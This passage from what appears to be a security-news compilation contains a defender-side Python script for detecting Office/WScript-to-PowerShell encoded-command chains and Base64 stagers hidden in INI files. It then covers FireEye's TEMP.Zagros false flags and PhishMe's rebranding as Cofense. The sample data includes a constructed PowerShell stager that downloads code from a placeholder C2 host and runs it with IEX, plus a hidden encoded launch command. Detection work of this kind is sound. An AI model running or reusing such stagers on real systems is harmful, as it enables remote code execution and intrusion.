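As an added defender-side example (not code from the FireEye report or from the securityaffairs article), the following Python shows how the chain described above surfaces in process telemetry and how the staged payload can be recovered: it scans constructed process-creation events for powershell.exe launched by a scripting host with an encoded command, decodes the Base64 argument the way PowerShell's -EncodedCommand expects it (UTF-16LE text, then Base64), and hunts a dropped INI file for Base64 values that decode to a PowerShell stager. The event field names (ParentImage, Image, CommandLine) follow Sysmon-style naming, and the sample stager, the host name c2.example.invalid, and the INI contents are constructed placeholders, not indicators from the campaign.

```python
"""Detection helpers for the Office macro -> WScript.exe (VBS) -> powershell.exe
-EncodedCommand chain, with the Base64 payload staged in a dropped INI file.
Added example: the sample events, INI text and stager string are constructed."""
import base64
import json
import re
from typing import Dict, List, Optional

# Parents that rarely have a legitimate reason to launch PowerShell.
SUSPICIOUS_PARENTS = {"wscript.exe", "cscript.exe", "winword.exe",
                      "excel.exe", "powerpnt.exe"}

# Tokens commonly present in decoded stagers; used for scoring, not as proof.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "net.webclient", "frombase64string", "bypass")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

# "key = <long Base64 blob>" lines inside an INI file.
INI_VALUE = re.compile(r"^\s*([^=;\s\[\]]+)\s*=\s*([A-Za-z0-9+/=]{40,})\s*$", re.M)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent.
    PowerShell encodes the script as UTF-16LE before Base64, so decode it that way."""
    for m in ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy is not a prefix of -EncodedCommand
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not UTF-16LE text
    return None


def score_decoded(script: str) -> List[str]:
    """List the suspicious tokens found in a decoded script (case-insensitive)."""
    low = script.lower()
    return [t for t in SUSPICIOUS_TOKENS if t in low]


def analyze_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag PowerShell launches that have a scripting-host/Office parent or an encoded command."""
    findings = []
    for ev in events:
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if image not in ("powershell.exe", "pwsh.exe"):
            continue
        reasons = []
        if parent in SUSPICIOUS_PARENTS:
            reasons.append(f"powershell spawned by {parent}")
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if decoded is not None:
            reasons.append("encoded command")
            reasons += [f"token:{t}" for t in score_decoded(decoded)]
        if reasons:
            findings.append({"pid": ev.get("ProcessId"), "parent": parent,
                             "reasons": reasons, "decoded": decoded})
    return findings


def find_base64_payloads_in_ini(text: str) -> List[Dict[str, object]]:
    """Find INI values that are Base64 and decode to text containing stager tokens."""
    hits = []
    for key, blob in INI_VALUE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                decoded = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            tokens = score_decoded(decoded)
            if tokens and all(c.isprintable() or c in "\r\n\t" for c in decoded):
                hits.append({"key": key, "encoding": enc, "tokens": tokens,
                             "decoded": decoded})
                break
    return hits


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample data (placeholder host name, not a real indicator).
SAMPLE_STAGER = ("$c=(New-Object Net.WebClient)"
                 ".DownloadString('http://c2.example.invalid/s');IEX $c")
SAMPLE_EVENTS = [
    {"ProcessId": "4120", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {_enc(SAMPLE_STAGER)}"},
    {"ProcessId": "4188", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"ProcessId": "4200", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
SAMPLE_INI = "[Settings]\nTheme=Classic\nUpdate=" + _enc(SAMPLE_STAGER) + "\nTimeout=30\n"

if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(json.dumps(finding, indent=2))
    for hit in find_base64_payloads_in_ini(SAMPLE_INI):
        print(json.dumps(hit, indent=2))
```

Two design points matter in practice: the flag matcher accepts every prefix of -EncodedCommand because PowerShell does, so a rule keyed only on the literal string "-EncodedCommand" misses "-enc" and "-e"; and the parent-process check fires independently of decoding, so a sample that switches to the later INF/SCT variant still raises the "PowerShell spawned by a scripting host or Office process" signal even when no encoded argument is present.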

Researchers at FireEye also found Chinese strings in the malicious code used by TEMP.Zagros, left as false flags to make attribution harder.

“During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:” states FireEye.

Indicators of compromise (IoCs) and other info are included in the report published by FireEye.

PhishMe Acquired at $400 Million Valuation, Rebranded as Cofense
26.2.2018 securityweek

Private Equity Deal Values Cofense at $400 Million

PhishMe, a security awareness firm that focuses on training employees on how to recognize and report phishing attacks, has been acquired by a private equity consortium in a deal that valued the company at $400 Million.

The company has also re-branded and changed its name to Cofense.

“PhishMe was founded to challenge the cliché - human is the weakest link,” said Rohyt Belani, CEO and Co-Founder of Cofense. “The Cofense solution set leverages internal employee-generated attack intelligence in concert with purpose-built response technologies to break the attack kill chain at delivery. Cofense reflects the full breadth of our portfolio of enterprise-wide attack detection, response, and orchestration solutions.”

The company says it currently has more than 1,700 customers globally and that its PhishMe Reporter is installed on more than 10 million endpoints.

In a recent survey by the Financial Services Information Sharing and Analysis Center (FS-ISAC) that polled more than 100 of its 7,000 global members, thirty-five percent of CISOs in the financial sector consider staff training to be the top priority for cyber defense.

“With cybersecurity a top priority for organizations everywhere, our goal is to continue bringing innovative products to markets around the globe to help stop active attacks faster than ever,” Belani added.

Cofense says it has experienced roughly 80% CAGR over the last four years, and has new offices opening in Australia, Singapore, Dubai, and Saudi Arabia.

The company has previously raised a total of roughly $58 million, including a large $42.5 million funding round in July 2016. The company had raised $2.5 million in July 2012 in a Series A round, followed by $13 Million in a Series B funding round in March 2015.

Security awareness firms have been the subject of significant funding and M&A transactions in recent months.

Earlier this month, security awareness training firm Wombat Security agreed to be acquired by Proofpoint for $225 million in cash. In August 2017, Webroot acquired Securecast, an Oregon-based company that specializes in security awareness training. In October 2017, security awareness training and simulated phishing firm KnowBe4 secured $30 million in Series B financing, which brought the total amount raised by KnowBe4 to $44 million. Security awareness training firm PhishMe has raised nearly $58 million in funding, including a $42.5 million Series C funding round in July 2016.